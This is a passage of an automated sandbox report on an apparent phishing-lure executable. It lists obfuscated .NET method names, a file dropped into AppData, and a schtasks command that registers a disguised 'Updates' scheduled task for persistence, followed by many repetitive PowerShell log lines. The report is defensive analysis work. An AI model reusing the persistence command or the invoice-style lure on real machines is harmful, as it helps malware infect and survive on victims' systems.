                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, X7d5Q5p1LvpfLmNfVx.csHigh entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, Ii9Xnwkaay1WuTYMGQ.csHigh entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, x5ws4ZMjtJeIYwNfXm.csHigh entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, aeNkwmhsZGOkwOyTql.csHigh entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, sCMxesXXjqAegoG9j6G.csHigh entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, iMBWkb0as7CGSU5mdc.csHigh entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, H9Z5mTAKXZyOtcycmt.csHigh entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, cVsg14PySj56ttQ831.csHigh entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, QqELW6HxRqDoYT0tcl.csHigh entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, POlyOhfijgKRcdlA2f.csHigh entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ERskp5zfMQtJPNdwj4.csHigh entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, hJrajR89jKhw22GlAw.csHigh entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, v1YFv8XpsPxjF1eUO8l.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, f0fXPuminhNt55QPq6.csHigh entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, knUupbQZqxsA2ZB6Nx.csHigh entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, RjDupPnYBMvHAAEH05.csHigh entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, o9P0T5X38MD9r6NPGD7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeFile created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
